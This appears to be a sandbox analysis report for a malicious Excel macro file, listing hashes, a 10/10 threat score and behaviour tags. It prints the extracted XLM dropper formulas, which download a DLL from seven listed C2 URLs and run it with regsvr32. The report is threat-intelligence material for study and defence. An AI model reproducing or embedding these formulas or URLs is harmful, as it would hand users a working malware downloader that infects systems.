Overview

overview

10

Static

static

10

94be69e8d9...6.xlsm

windows7-x64

10

94be69e8d9...6.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    94be69e8d99af1485037343d4a3bd0aa87a04b780654c9d36606c0dd37a20f56

  • Size

    30KB

  • Sample

    241120-we1hxsvmgr

  • MD5

    f0a45501788b20a08008b2466ad4b916

  • SHA1

    b585ed2158e171b411276ef035c3f3d4230e0512

  • SHA256

    94be69e8d99af1485037343d4a3bd0aa87a04b780654c9d36606c0dd37a20f56

  • SHA512

    ae270b383fa3c739a72076866d793d0b56487460d5328a21d77339b5440f419a51fd48fb9e5bdaf38a2d599fa374f2a0672be9a4e1810e1aee358d80ed556950

  • SSDEEP

    384:H842JZPFhNjtOA7icg0SCdiVH2KgUrNU/qWhZOdBNPJM+kqr9eCgh0k5M2E6v:AHFhNZliH2ydFfPdkqstJhE6v

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://henrysfreshroast.com/6cc4ts0bkrOlXq/

http://consejosdeorlando.com/wp-includes/jxTbRk2DgQOIOyokR/

http://blog.centerking.top/wp-includes/DBq5jx/

http://polarrefrigeracao.com.br/fontes/y7QpO/

http://filmsetserie.dx.am/img/ghCY9J5KD1J/

https://vagbharati.in/wp-admin/nYBb/

http://advogadogoiania.com.br/wp-includes/O9Az4/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://henrysfreshroast.com/6cc4ts0bkrOlXq/","..\rfs.dll",0,0) =IF('LFEVE'!F11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://consejosdeorlando.com/wp-includes/jxTbRk2DgQOIOyokR/","..\rfs.dll",0,0)) =IF('LFEVE'!F13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://blog.centerking.top/wp-includes/DBq5jx/","..\rfs.dll",0,0)) =IF('LFEVE'!F15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://polarrefrigeracao.com.br/fontes/y7QpO/","..\rfs.dll",0,0)) =IF('LFEVE'!F17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://filmsetserie.dx.am/img/ghCY9J5KD1J/","..\rfs.dll",0,0)) =IF('LFEVE'!F19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://vagbharati.in/wp-admin/nYBb/","..\rfs.dll",0,0)) =IF('LFEVE'!F21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://advogadogoiania.com.br/wp-includes/O9Az4/","..\rfs.dll",0,0)) =IF('LFEVE'!F23<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\rfs.dll") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://henrysfreshroast.com/6cc4ts0bkrOlXq/

Targets

    • Target

      94be69e8d99af1485037343d4a3bd0aa87a04b780654c9d36606c0dd37a20f56

    • Size

      30KB

    • MD5

      f0a45501788b20a08008b2466ad4b916

    • SHA1

      b585ed2158e171b411276ef035c3f3d4230e0512

    • SHA256

      94be69e8d99af1485037343d4a3bd0aa87a04b780654c9d36606c0dd37a20f56

    • SHA512

      ae270b383fa3c739a72076866d793d0b56487460d5328a21d77339b5440f419a51fd48fb9e5bdaf38a2d599fa374f2a0672be9a4e1810e1aee358d80ed556950

    • SSDEEP

      384:H842JZPFhNjtOA7icg0SCdiVH2KgUrNU/qWhZOdBNPJM+kqr9eCgh0k5M2E6v:AHFhNZliH2ydFfPdkqstJhE6v

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks